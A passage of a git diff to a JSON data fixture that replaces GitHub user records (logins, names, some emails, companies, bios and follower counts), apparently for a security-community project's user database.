"is_hireable": false, "twitter_username": "" @@ -427028,24 +686577,24 @@ }, { "model": "github.user", - "pk": 2672, + "pk": 8027, "fields": { - "nest_created_at": "2024-09-12T01:38:58.717Z", - "nest_updated_at": "2024-09-12T01:38:58.717Z", - "name": "", - "login": "nandu525", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32590543?v=4", + "nest_created_at": "2024-09-22T09:39:50.607Z", + "nest_updated_at": "2024-09-22T19:38:52.450Z", + "name": "Hen Barshak", + "login": "hbarshak", + "email": "henb@synopsys.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12154425?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-10-07T08:29:21Z", - "updated_at": "2024-06-18T08:20:34Z", - "node_id": "MDQ6VXNlcjMyNTkwNTQz", + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2015-04-28T13:56:13Z", + "updated_at": "2024-03-06T10:50:34Z", + "node_id": "MDQ6VXNlcjEyMTU0NDI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427053,74 +686602,74 @@ }, { "model": "github.user", - "pk": 2673, + "pk": 8028, "fields": { - "nest_created_at": "2024-09-12T01:39:01.614Z", - "nest_updated_at": "2024-09-12T01:39:46.850Z", - "name": "Eugen Hoffmann", - "login": "eugenhoffmann", + "nest_created_at": "2024-09-22T09:39:51.239Z", + "nest_updated_at": "2024-09-22T19:38:53.069Z", + "name": "Zach Irons", + "login": "zirons1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/142139018?v=4", - "company": "Rohde & Schwarz GmbH & Co. KG", - "location": "Munich", + "avatar_url": "https://avatars.githubusercontent.com/u/18015453?v=4", + "company": "Contrast Security", + "location": "Baltimore, MD", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-13T06:34:45Z", - "updated_at": "2024-09-02T08:25:45Z", - "node_id": "U_kgDOCHjeig", - "bio": "", + "following_count": 13, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2016-03-22T20:10:22Z", + "updated_at": "2024-07-31T14:39:48Z", + "node_id": "MDQ6VXNlcjE4MDE1NDUz", + "bio": "Finally uploading some projects to GitHub. Hello followers: Matt Stout, Tyler Howard, Adam Stone, Ryan Dens, Ati Ok, Ryan Geary, Collin Reilly Clark, and others", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2674, + "pk": 8029, "fields": { - "nest_created_at": "2024-09-12T01:39:03.739Z", - "nest_updated_at": "2024-09-12T01:39:03.739Z", - "name": "Caleb Szalacinski", - "login": "Szalacinski", + "nest_created_at": "2024-09-22T09:39:51.552Z", + "nest_updated_at": "2024-09-22T19:38:53.382Z", + "name": "Randy Gingeleski", + "login": "gingeleski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1143359?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4685844?v=4", "company": "", - "location": "Nashville, Tennessee", + "location": "", "collaborators_count": 0, - "following_count": 26, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2011-10-21T14:52:15Z", - "updated_at": "2024-06-21T22:22:12Z", - "node_id": "MDQ6VXNlcjExNDMzNTk=", - "bio": "", - "is_hireable": true, - "twitter_username": "" + "following_count": 135, + "followers_count": 109, + "public_gists_count": 28, + "public_repositories_count": 50, + "created_at": "2013-06-13T06:04:07Z", + "updated_at": "2024-09-11T23:08:12Z", + "node_id": "MDQ6VXNlcjQ2ODU4NDQ=", + "bio": "security engineer, automating all the things, blockchain observer, game hacker", + "is_hireable": false, + "twitter_username": "gingeleski" } }, { "model": "github.user", - "pk": 2675, + "pk": 8030, "fields": { - "nest_created_at": "2024-09-12T01:39:06.673Z", - "nest_updated_at": "2024-09-12T01:39:06.673Z", + "nest_created_at": "2024-09-22T09:39:51.866Z", + "nest_updated_at": "2024-09-22T19:38:53.698Z", "name": "", - "login": "cheonsaxelle", + "login": "ParthiShah", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/118678392?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20813697?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-11-20T15:42:08Z", - "updated_at": "2023-11-13T12:26:16Z", - "node_id": "U_kgDOBxLjeA", + "public_repositories_count": 1, + "created_at": "2016-08-03T10:06:50Z", + "updated_at": "2016-08-03T10:06:50Z", + "node_id": "MDQ6VXNlcjIwODEzNjk3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427128,74 +686677,74 @@ }, { "model": "github.user", - "pk": 2676, + "pk": 8031, "fields": { - "nest_created_at": "2024-09-12T01:39:08.824Z", - "nest_updated_at": "2024-09-16T22:29:04.024Z", - "name": "永格天", - "login": "we684123", - "email": "we684123@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/22027801?v=4", + "nest_created_at": "2024-09-22T09:39:52.181Z", + "nest_updated_at": "2024-09-22T19:39:08.568Z", + "name": "Nuno Oliveira", + "login": "nunoocx", + "email": "nuno.oliveira@checkmarx.com", + "avatar_url": "https://avatars.githubusercontent.com/u/72192573?v=4", "company": "", - "location": "Taiwan", + "location": "", "collaborators_count": 0, - "following_count": 71, - "followers_count": 49, - "public_gists_count": 4, - "public_repositories_count": 58, - "created_at": "2016-09-06T12:19:06Z", - "updated_at": "2024-08-24T07:19:23Z", - "node_id": "MDQ6VXNlcjIyMDI3ODAx", - "bio": "耕耘者的說 (づ¯ ³ ¯)づ", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-10-01T08:13:28Z", + "updated_at": "2024-05-23T20:58:53Z", + "node_id": "MDQ6VXNlcjcyMTkyNTcz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2677, + "pk": 8032, "fields": { - "nest_created_at": "2024-09-12T01:39:14.794Z", - "nest_updated_at": "2024-09-12T01:39:14.794Z", - "name": "Benjamin Otto", - "login": "otbe", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3391052?v=4", - "company": "PRISMA European Capacity Platform GmbH", - "location": "Germany, Leipzig", + "nest_created_at": "2024-09-22T09:39:52.506Z", + "nest_updated_at": "2024-09-22T19:38:54.378Z", + "name": "Nipuna Weerasekara", + "login": "Niweera", + "email": "w.nipuna@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25348766?v=4", + "company": "IMDEA Networks Institute", + "location": "Leganés, Madrid", "collaborators_count": 0, - "following_count": 0, - "followers_count": 26, - "public_gists_count": 7, - "public_repositories_count": 50, - "created_at": "2013-01-26T15:28:16Z", - "updated_at": "2024-07-15T21:55:35Z", - "node_id": "MDQ6VXNlcjMzOTEwNTI=", - "bio": "fullstack developer, cloud lover, OSS believer", + "following_count": 34, + "followers_count": 99, + "public_gists_count": 98, + "public_repositories_count": 71, + "created_at": "2017-01-25T15:48:58Z", + "updated_at": "2024-07-31T07:40:42Z", + "node_id": "MDQ6VXNlcjI1MzQ4NzY2", + "bio": "Even after I'm long dead, my software will live forever...", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Niweera" } }, { "model": "github.user", - "pk": 2678, + "pk": 8033, "fields": { - "nest_created_at": "2024-09-12T01:39:17.265Z", - "nest_updated_at": "2024-09-12T01:39:17.265Z", - "name": "", - "login": "Sp33dy42", + "nest_created_at": "2024-09-22T09:39:52.828Z", + "nest_updated_at": "2024-09-22T19:39:08.256Z", + "name": "Nick Couraud", + "login": "ncouraud", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/172411194?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/700470?v=4", + "company": "@microsoft ", + "location": "Boston, MA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-06-11T15:16:41Z", - "updated_at": "2024-06-11T15:16:52Z", - "node_id": "U_kgDOCkbJOg", + "following_count": 14, + "followers_count": 31, + "public_gists_count": 3, + "public_repositories_count": 7, + "created_at": "2011-03-31T00:05:39Z", + "updated_at": "2024-07-29T16:21:30Z", + "node_id": "MDQ6VXNlcjcwMDQ3MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427203,24 +686752,24 @@ }, { "model": "github.user", - "pk": 2679, + "pk": 8034, "fields": { - "nest_created_at": "2024-09-12T01:39:22.487Z", - "nest_updated_at": "2024-09-12T01:39:22.487Z", - "name": "Merlin Ran", - "login": "merlinran", + "nest_created_at": "2024-09-22T09:39:53.144Z", + "nest_updated_at": "2024-09-22T20:24:19.315Z", + "name": "Myriam", + "login": "iammyr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1369696?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1551998?v=4", "company": "", - "location": "Toronto, ON", + "location": "", "collaborators_count": 0, - "following_count": 64, - "followers_count": 27, - "public_gists_count": 4, - "public_repositories_count": 43, - "created_at": "2012-01-23T02:22:01Z", - "updated_at": "2024-08-16T15:37:13Z", - "node_id": "MDQ6VXNlcjEzNjk2OTY=", + "following_count": 3, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2012-03-19T08:25:44Z", + "updated_at": "2024-07-08T08:31:11Z", + "node_id": "MDQ6VXNlcjE1NTE5OTg=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -427228,49 +686777,49 @@ }, { "model": "github.user", - "pk": 2680, + "pk": 8035, "fields": { - "nest_created_at": "2024-09-12T01:39:23.774Z", - "nest_updated_at": "2024-09-12T01:39:23.774Z", - "name": "Andrés Tito", - "login": "LaVibeX", + "nest_created_at": "2024-09-22T09:39:53.454Z", + "nest_updated_at": "2024-09-22T19:38:55.320Z", + "name": "Marcos P.", + "login": "marcosdotps", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52439101?v=4", - "company": "@Rohde-Schwarz", - "location": "Munich, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/13149191?v=4", + "company": "", + "location": "The Wall", "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2019-07-02T04:48:13Z", - "updated_at": "2024-08-30T11:33:51Z", - "node_id": "MDQ6VXNlcjUyNDM5MTAx", - "bio": "MSc Communication & Electronics @ TUM | Product Security & Embedded Security Enthusiast |\r\nHow Much Coffee Is Too Much Coffee? ☕\r\n", + "following_count": 14, + "followers_count": 17, + "public_gists_count": 1, + "public_repositories_count": 46, + "created_at": "2015-07-02T10:03:25Z", + "updated_at": "2024-08-20T16:41:30Z", + "node_id": "MDQ6VXNlcjEzMTQ5MTkx", + "bio": "Senior Reliability Engineer @Github. Real knowledge is to know the extent of one's ignorance.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2681, + "pk": 8036, "fields": { - "nest_created_at": "2024-09-12T01:39:52.697Z", - "nest_updated_at": "2024-09-12T01:39:52.697Z", - "name": "", - "login": "qiaozhi199", + "nest_created_at": "2024-09-22T09:39:53.778Z", + "nest_updated_at": "2024-09-22T19:38:55.634Z", + "name": "Manuel Álvarez Álvarez", + "login": "manuel-alvarez-alvarez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175908267?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4885539?v=4", + "company": "@datadog", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-07-18T03:17:03Z", - "updated_at": "2024-07-18T03:17:09Z", - "node_id": "U_kgDOCnwlqw", + "public_repositories_count": 37, + "created_at": "2013-06-29T19:44:05Z", + "updated_at": "2024-09-02T19:09:34Z", + "node_id": "MDQ6VXNlcjQ4ODU1Mzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427278,24 +686827,24 @@ }, { "model": "github.user", - "pk": 2682, + "pk": 8037, "fields": { - "nest_created_at": "2024-09-12T01:39:56.505Z", - "nest_updated_at": "2024-09-12T01:39:56.505Z", - "name": "Michal Dobaczewski", - "login": "michal-futurice", + "nest_created_at": "2024-09-22T09:39:54.093Z", + "nest_updated_at": "2024-09-22T19:38:55.945Z", + "name": "", + "login": "Guluis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61732153?v=4", - "company": "@futurice", + "avatar_url": "https://avatars.githubusercontent.com/u/20287258?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-03-03T08:55:06Z", - "updated_at": "2023-10-30T11:18:37Z", - "node_id": "MDQ6VXNlcjYxNzMyMTUz", + "public_repositories_count": 1, + "created_at": "2016-07-04T18:19:32Z", + "updated_at": "2024-01-07T11:59:59Z", + "node_id": "MDQ6VXNlcjIwMjg3MjU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427303,74 +686852,74 @@ }, { "model": "github.user", - "pk": 2683, + "pk": 8038, "fields": { - "nest_created_at": "2024-09-12T01:39:58.175Z", - "nest_updated_at": "2024-09-12T01:39:58.175Z", - "name": "Philipp Gortan", - "login": "mephinet", - "email": "mephinet@gmx.net", - "avatar_url": "https://avatars.githubusercontent.com/u/1292953?v=4", - "company": "", - "location": "Vienna, Austria", + "nest_created_at": "2024-09-22T09:39:54.418Z", + "nest_updated_at": "2024-09-22T19:38:56.253Z", + "name": "Fabian Yamaguchi", + "login": "fabsx00", + "email": "mail@fabianyamaguchi.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1379115?v=4", + "company": "ShiftLeft Inc", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 9, - "followers_count": 20, - "public_gists_count": 13, - "public_repositories_count": 76, - "created_at": "2011-12-29T18:50:09Z", - "updated_at": "2023-11-22T22:14:42Z", - "node_id": "MDQ6VXNlcjEyOTI5NTM=", + "following_count": 27, + "followers_count": 264, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2012-01-25T13:42:19Z", + "updated_at": "2024-08-29T13:00:57Z", + "node_id": "MDQ6VXNlcjEzNzkxMTU=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "fabsx00" } }, { "model": "github.user", - "pk": 2684, + "pk": 8039, "fields": { - "nest_created_at": "2024-09-12T01:40:02.373Z", - "nest_updated_at": "2024-09-14T19:18:00.050Z", - "name": "piotr.baltrukiewicz", - "login": "DaBalt", + "nest_created_at": "2024-09-22T09:39:55.079Z", + "nest_updated_at": "2024-09-22T19:38:56.898Z", + "name": "Dean", + "login": "deanf1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/149802014?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9951187?v=4", "company": "", - "location": "", + "location": "Baltimore, MD", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-03T13:52:34Z", - "updated_at": "2024-07-17T07:52:34Z", - "node_id": "U_kgDOCO3MHg", + "public_repositories_count": 8, + "created_at": "2014-11-25T18:17:16Z", + "updated_at": "2024-06-07T18:43:03Z", + "node_id": "MDQ6VXNlcjk5NTExODc=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2685, + "pk": 8040, "fields": { - "nest_created_at": "2024-09-12T01:40:04.513Z", - "nest_updated_at": "2024-09-12T01:40:04.513Z", - "name": "Michael De Checchi", - "login": "rknj", + "nest_created_at": "2024-09-22T09:39:55.767Z", + "nest_updated_at": "2024-09-22T19:38:57.531Z", + "name": "appscanchallenge", + "login": "appscanchallenge", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17745190?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/99333962?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, - "public_gists_count": 7, - "public_repositories_count": 16, - "created_at": "2016-03-09T14:01:29Z", - "updated_at": "2024-08-18T11:29:53Z", - "node_id": "MDQ6VXNlcjE3NzQ1MTkw", + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-02-09T12:24:16Z", + "updated_at": "2022-02-10T05:52:33Z", + "node_id": "U_kgDOBeu3Sg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427378,24 +686927,24 @@ }, { "model": "github.user", - "pk": 2686, + "pk": 8041, "fields": { - "nest_created_at": "2024-09-12T01:40:06.657Z", - "nest_updated_at": "2024-09-12T01:40:06.657Z", - "name": "", - "login": "jw1u1", + "nest_created_at": "2024-09-22T09:39:56.077Z", + "nest_updated_at": "2024-09-22T19:39:04.717Z", + "name": "Arun Muthu", + "login": "arunmuthu255", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89261565?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/36296285?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-08-20T13:56:32Z", - "updated_at": "2024-04-17T15:02:37Z", - "node_id": "MDQ6VXNlcjg5MjYxNTY1", + "public_repositories_count": 5, + "created_at": "2018-02-09T10:02:28Z", + "updated_at": "2023-08-02T17:29:34Z", + "node_id": "MDQ6VXNlcjM2Mjk2Mjg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427403,24 +686952,49 @@ }, { "model": "github.user", - "pk": 2687, + "pk": 8042, "fields": { - "nest_created_at": "2024-09-12T01:40:10.042Z", - "nest_updated_at": "2024-09-12T01:40:10.042Z", - "name": "Paul Ritzkat", - "login": "PaulRitzkat0110", + "nest_created_at": "2024-09-22T09:40:02.012Z", + "nest_updated_at": "2024-09-22T19:39:03.662Z", + "name": "Edward Minnix III", + "login": "egregius313", + "email": "egregius313@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18200959?v=4", + "company": "@github", + "location": "New Jersey", + "collaborators_count": 0, + "following_count": 67, + "followers_count": 45, + "public_gists_count": 17, + "public_repositories_count": 63, + "created_at": "2016-04-01T00:24:55Z", + "updated_at": "2024-07-26T04:01:41Z", + "node_id": "MDQ6VXNlcjE4MjAwOTU5", + "bio": "Working on @codeql ", + "is_hireable": true, + "twitter_username": "egregius313" + } +}, +{ + "model": "github.user", + "pk": 8043, + "fields": { + "nest_created_at": "2024-09-22T09:40:02.329Z", + "nest_updated_at": "2024-09-22T19:39:03.980Z", + "name": "Sebastian Roth", + "login": "sebsnyk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55187860?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/97243337?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-09-11T10:17:35Z", - "updated_at": "2024-09-06T10:54:05Z", - "node_id": "MDQ6VXNlcjU1MTg3ODYw", + "following_count": 8, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 80, + "created_at": "2022-01-06T15:58:33Z", + "updated_at": "2024-08-12T13:42:14Z", + "node_id": "U_kgDOBcvQyQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427428,24 +687002,24 @@ }, { "model": "github.user", - "pk": 2688, + "pk": 8044, "fields": { - "nest_created_at": "2024-09-12T01:40:12.598Z", - "nest_updated_at": "2024-09-12T01:40:12.598Z", - "name": "", - "login": "guyscher2", + "nest_created_at": "2024-09-22T09:40:03.342Z", + "nest_updated_at": "2024-09-22T19:39:05.058Z", + "name": "Barath Raj", + "login": "0xgoto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/124155741?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/65106361?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-02-01T11:47:16Z", - "updated_at": "2024-06-20T08:11:29Z", - "node_id": "U_kgDOB2Z3XQ", + "public_repositories_count": 17, + "created_at": "2020-05-10T06:38:19Z", + "updated_at": "2024-09-13T17:19:49Z", + "node_id": "MDQ6VXNlcjY1MTA2MzYx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427453,24 +687027,24 @@ }, { "model": "github.user", - "pk": 2689, + "pk": 8045, "fields": { - "nest_created_at": "2024-09-12T01:40:16.382Z", - "nest_updated_at": "2024-09-12T01:40:16.382Z", - "name": "", - "login": "pragyanjeet", + "nest_created_at": "2024-09-22T09:40:03.653Z", + "nest_updated_at": "2024-09-22T19:39:05.370Z", + "name": "gx1", + "login": "giper45", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46196761?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18548727?v=4", + "company": "@cybersecsi ", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-12-27T15:21:46Z", - "updated_at": "2024-08-22T16:50:04Z", - "node_id": "MDQ6VXNlcjQ2MTk2NzYx", + "following_count": 8, + "followers_count": 72, + "public_gists_count": 22, + "public_repositories_count": 169, + "created_at": "2016-04-19T08:36:12Z", + "updated_at": "2024-08-26T12:55:03Z", + "node_id": "MDQ6VXNlcjE4NTQ4NzI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427478,99 +687052,99 @@ }, { "model": "github.user", - "pk": 2690, + "pk": 8046, "fields": { - "nest_created_at": "2024-09-12T01:40:17.632Z", - "nest_updated_at": "2024-09-12T01:40:17.632Z", - "name": "", - "login": "antrix", + "nest_created_at": "2024-09-22T09:40:04.655Z", + "nest_updated_at": "2024-09-22T19:39:06.349Z", + "name": "Alejandro Lagos Mejia", + "login": "alejolagosm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/204373?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95934992?v=4", + "company": "@FluidAttacks", + "location": "Colombia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2010-02-16T04:16:25Z", - "updated_at": "2024-08-08T07:33:19Z", - "node_id": "MDQ6VXNlcjIwNDM3Mw==", - "bio": "", + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2021-12-10T18:03:03Z", + "updated_at": "2024-08-26T23:07:51Z", + "node_id": "U_kgDOBbfaEA", + "bio": "Software engineer with a background in civil engineering.\r\nPassionate about front-end and all things data. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2691, + "pk": 8047, "fields": { - "nest_created_at": "2024-09-12T01:40:22.717Z", - "nest_updated_at": "2024-09-18T00:18:37.227Z", - "name": "Thomas Schauer-Köckeis", - "login": "Gepardgame", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75749982?v=4", - "company": "@Rohde-Schwarz", + "nest_created_at": "2024-09-22T09:40:04.977Z", + "nest_updated_at": "2024-09-22T19:39:06.671Z", + "name": "Avi Hayoun", + "login": "avihayoun", + "email": "avi.hayoun@snyk.io", + "avatar_url": "https://avatars.githubusercontent.com/u/110378504?v=4", + "company": "@snyk ", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 5, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 9, - "created_at": "2020-12-09T17:49:41Z", - "updated_at": "2024-09-13T14:19:27Z", - "node_id": "MDQ6VXNlcjc1NzQ5OTgy", - "bio": "Cybersecurity Student", + "created_at": "2022-08-01T07:12:45Z", + "updated_at": "2024-03-25T08:09:22Z", + "node_id": "U_kgDOBpQ-CA", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2692, + "pk": 8048, "fields": { - "nest_created_at": "2024-09-12T01:40:28.141Z", - "nest_updated_at": "2024-09-12T01:40:28.141Z", - "name": "Thomas Vitale", - "login": "ThomasVitale", + "nest_created_at": "2024-09-22T09:40:05.983Z", + "nest_updated_at": "2024-09-22T19:39:07.608Z", + "name": "Gokul Ramesh", + "login": "gokul-ramesh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8523418?v=4", - "company": "Systematic A/S", - "location": "Denmark", + "avatar_url": "https://avatars.githubusercontent.com/u/65040016?v=4", + "company": "", + "location": "Bengaluru", "collaborators_count": 0, - "following_count": 33, - "followers_count": 819, - "public_gists_count": 16, - "public_repositories_count": 146, - "created_at": "2014-08-22T12:52:56Z", - "updated_at": "2024-09-04T17:58:00Z", - "node_id": "MDQ6VXNlcjg1MjM0MTg=", - "bio": "Software Engineer | Author of \"Cloud Native Spring in Action\" | Spring, Java, Kubernetes | Cloud Native Development | Application & Software Security", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-05-08T18:38:29Z", + "updated_at": "2024-04-16T06:46:50Z", + "node_id": "MDQ6VXNlcjY1MDQwMDE2", + "bio": "Software Engineer - Application Security\r\n", "is_hireable": false, - "twitter_username": "vitalethomas" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2693, + "pk": 8049, "fields": { - "nest_created_at": "2024-09-12T01:40:29.420Z", - "nest_updated_at": "2024-09-12T01:40:29.420Z", - "name": "", - "login": "samuvb", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/141024884?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:40:07.261Z", + "nest_updated_at": "2024-09-22T19:39:08.884Z", + "name": "Viszkok Tamás", + "login": "viszkoktamas", + "email": "viszkok.tamas.93@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17620914?v=4", + "company": "Deutsche Telekom IT Solutions Hungary", + "location": "Szeged", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-31T10:04:46Z", - "updated_at": "2024-08-29T14:05:35Z", - "node_id": "U_kgDOCGfedA", + "public_repositories_count": 8, + "created_at": "2016-03-03T17:06:43Z", + "updated_at": "2024-09-01T11:32:43Z", + "node_id": "MDQ6VXNlcjE3NjIwOTE0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427578,24 +687152,24 @@ }, { "model": "github.user", - "pk": 2694, + "pk": 8050, "fields": { - "nest_created_at": "2024-09-12T01:40:37.395Z", - "nest_updated_at": "2024-09-14T19:18:03.948Z", + "nest_created_at": "2024-09-22T09:40:07.585Z", + "nest_updated_at": "2024-09-22T19:39:09.196Z", "name": "", - "login": "Najafov007", + "login": "cx-rafaelc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100145093?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/153817659?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2022-02-21T14:47:58Z", - "updated_at": "2024-08-28T05:52:00Z", - "node_id": "U_kgDOBfgXxQ", + "public_repositories_count": 1, + "created_at": "2023-12-14T09:54:14Z", + "updated_at": "2024-04-03T17:35:11Z", + "node_id": "U_kgDOCSsSOw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427603,24 +687177,24 @@ }, { "model": "github.user", - "pk": 2695, + "pk": 8051, "fields": { - "nest_created_at": "2024-09-12T01:40:43.777Z", - "nest_updated_at": "2024-09-12T01:40:43.777Z", + "nest_created_at": "2024-09-22T09:40:07.895Z", + "nest_updated_at": "2024-09-22T19:39:09.540Z", "name": "", - "login": "tatyana12345", + "login": "mattmurp", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17821387?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18172444?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 8, "public_gists_count": 0, "public_repositories_count": 12, - "created_at": "2016-03-14T05:41:10Z", - "updated_at": "2024-09-11T08:23:51Z", - "node_id": "MDQ6VXNlcjE3ODIxMzg3", + "created_at": "2016-03-30T16:37:15Z", + "updated_at": "2024-08-13T21:28:30Z", + "node_id": "MDQ6VXNlcjE4MTcyNDQ0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427628,74 +687202,74 @@ }, { "model": "github.user", - "pk": 2696, + "pk": 8052, "fields": { - "nest_created_at": "2024-09-12T01:40:48.579Z", - "nest_updated_at": "2024-09-12T02:15:02.588Z", - "name": "Dependency-Track Bot", - "login": "dependencytrack-bot", + "nest_created_at": "2024-09-22T09:40:08.212Z", + "nest_updated_at": "2024-09-22T19:39:09.852Z", + "name": "", + "login": "springkill", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106437498?v=4", - "company": "OWASP", + "avatar_url": "https://avatars.githubusercontent.com/u/118535366?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 30, + "followers_count": 132, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-05-28T13:31:23Z", - "updated_at": "2023-12-08T14:57:08Z", - "node_id": "U_kgDOBlgbeg", + "public_repositories_count": 15, + "created_at": "2022-11-18T12:09:39Z", + "updated_at": "2024-08-11T15:32:52Z", + "node_id": "U_kgDOBxC0xg", "bio": "", "is_hireable": false, - "twitter_username": "DependencyTrack" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2697, + "pk": 8053, "fields": { - "nest_created_at": "2024-09-12T01:41:46.964Z", - "nest_updated_at": 